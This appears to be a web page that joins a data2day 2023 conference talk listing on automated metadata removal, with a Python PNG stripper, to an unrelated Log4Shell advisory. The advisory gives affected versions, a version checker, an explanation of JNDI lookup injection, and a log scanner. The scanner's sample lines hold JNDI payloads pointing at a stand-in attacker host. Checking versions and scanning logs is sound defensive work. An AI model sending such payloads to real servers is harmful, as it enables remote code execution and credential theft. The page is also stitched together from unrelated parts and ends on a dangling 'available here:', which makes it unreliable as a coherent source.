data2day 2023

The conference for data scientists,
data engineers, and data teams

October 11 and 12, 2023, Karlsruhe
Watch our team performing live on stage

Integrating Data-Privacy Through Pipelines

All data stored on a filesystem carries some metadata, sometimes more and sometimes less. This can be a serious privacy risk, since the metadata can contain sensitive data that can be used to identify persons, locations, or other interesting information.
To avoid leaking hidden sensitive information, it is crucial to ensure that all data that is stored and processed is clean. This task is well suited to automation.

This talk will focus on how to remove all metadata and how to automate this procedure through data processing pipelines that can be used in MLOps as well as in classical DevOps cycles.
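
As a rough illustration of what one such pipeline step could look like, the sketch below strips metadata chunks from a PNG file using only the Python standard library. It is not taken from the talk: the function names (`make_chunk`, `strip_png_metadata`), the selection of chunk types, and the sample author comment are assumptions made for this example, and a real pipeline would need to cover many more file formats.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Ancillary chunk types that commonly carry metadata
# (free-text comments, EXIF data, last-modified timestamps).
# This selection is an assumption for the example, not an exhaustive list.
METADATA_CHUNKS = {b"tEXt", b"zTXt", b"iTXt", b"eXIf", b"tIME"}


def make_chunk(chunk_type: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk: length, type, payload, CRC over type + payload."""
    crc = zlib.crc32(chunk_type + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + chunk_type + payload + struct.pack(">I", crc)


def strip_png_metadata(data: bytes) -> bytes:
    """Return the PNG bytes with all chunks listed in METADATA_CHUNKS removed."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    kept = [PNG_SIGNATURE]
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, chunk_type = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + payload + 4 CRC
        if end > len(data):
            raise ValueError("truncated chunk")
        if chunk_type not in METADATA_CHUNKS:
            kept.append(data[pos:end])
        pos = end
    return b"".join(kept)


# Tiny hand-built 1x1 grayscale PNG with a hypothetical author comment.
ihdr = make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
comment = make_chunk(b"tEXt", b"Author\x00Jane Doe")
idat = make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
iend = make_chunk(b"IEND", b"")
original = PNG_SIGNATURE + ihdr + comment + idat + iend

cleaned = strip_png_metadata(original)
print(b"Jane Doe" in original, b"Jane Doe" in cleaned)  # True False
```

Because the function works on bytes and leaves all other chunks untouched, it could be called from any pipeline stage that reads and writes files. Filesystem-level metadata such as owner or timestamps is a separate concern and is not handled here.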

Previous knowledge

  • Fundamental Machine Learning and Data Science terms and practices

Learning objectives

  • Automation of removal of (sensitive) metadata in a wide variety of areas



Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0: JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints.


Versions 1.x, which are no longer maintained, have a similar vulnerability.
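
The affected 2.x ranges stated above can be turned into a simple version check. The following is a minimal sketch, not an official tool: the helper names `parse_version` and `is_affected` are made up for this example, the version grammar is a simplifying assumption, and only the ranges exactly as quoted above are encoded, so later backported security releases and the separate 1.x issue are not considered.

```python
import re

# Ranges copied from the statement above (both ends inclusive).
AFFECTED_RANGES = [("2.0-beta9", "2.12.1"), ("2.13.0", "2.15.0")]

# Pre-release stages sort before the final release of the same version.
STAGE_ORDER = {"alpha": 0, "beta": 1, "rc": 2, None: 3}


def parse_version(text: str) -> tuple:
    """Turn '2.14.1' or '2.0-beta9' into a tuple that sorts correctly."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unsupported version string: {text!r}")
    major, minor = int(m[1]), int(m[2])
    patch = int(m[3] or 0)
    return (major, minor, patch, STAGE_ORDER[m[4]], int(m[5] or 0))


def is_affected(version: str) -> bool:
    """Check a Log4j version against the ranges listed in AFFECTED_RANGES."""
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AFFECTED_RANGES)


for candidate in ["2.0-beta8", "2.0-beta9", "2.12.1", "2.12.2", "2.14.1", "2.16.0"]:
    print(candidate, is_affected(candidate))
```

A result of `False` only means the version lies outside the two quoted ranges; it is not proof that an installation is safe.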


A zero-day remote code execution vulnerability has been discovered, allowing attackers to take complete control of systems without authentication.
The vulnerability was publicly disclosed via GitHub on December 9, 2021.

According to current information, the vulnerability was first exploited on December 1, 2021, but mass attacks only became known after the public disclosure on December 9, 2021.


The Log4j log output supports a wide range of variable lookups. These can be triggered not only internally, from a system perspective, but also from any remote location. Attackers can call external Java libraries via, e.g., ${jndi:ldap:// or ${jndi:ldaps://, which makes it possible to drop a shell without much additional effort. In addition, attackers can use ${jndi:rmi to execute commands directly within the current environment.
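
The lookup prefixes named above can be searched for in existing log files. The sketch below is a deliberately naive scanner, assuming plain-text log lines; the function name `find_jndi_lookups`, the sample lines, and the host `attacker.example` are hypothetical. It only matches the literal prefixes and will miss obfuscated variants that use nested lookups, so it should be read as an illustration rather than a detection rule.

```python
import re

# Matches the plain lookup prefixes ${jndi:ldap:, ${jndi:ldaps: and ${jndi:rmi:
# regardless of upper or lower case.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldaps?|rmi):", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, scheme) for every plain JNDI lookup found."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI_PATTERN.finditer(line):
            hits.append((number, match.group(1).lower()))
    return hits


# Hypothetical log lines for demonstration only.
sample = [
    'GET / HTTP/1.1 "Mozilla/5.0"',
    "User-Agent: ${jndi:ldap://attacker.example/a}",
    "X-Api-Version: ${JNDI:RMI://attacker.example/b}",
    "Referer: ${${lower:j}ndi:ldap://attacker.example/c}",  # obfuscated, not matched
]
print(find_jndi_lookups(sample))  # [(2, 'ldap'), (3, 'rmi')]
```

The fourth sample line shows the limitation: the nested `${lower:j}` lookup hides the `jndi` keyword from a simple pattern match.
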
For any cloud service, the Log4j log output could be used to read credentials, such as access tokens, potentially allowing wide-ranging access to cloud services. The following guide contains ndaal's expert information and measures for handling the ongoing Log4Shell cybersecurity incident and attack wave caused by a critical vulnerability in the Apache Log4j logging library v2.x.

The document will be updated frequently and is available here: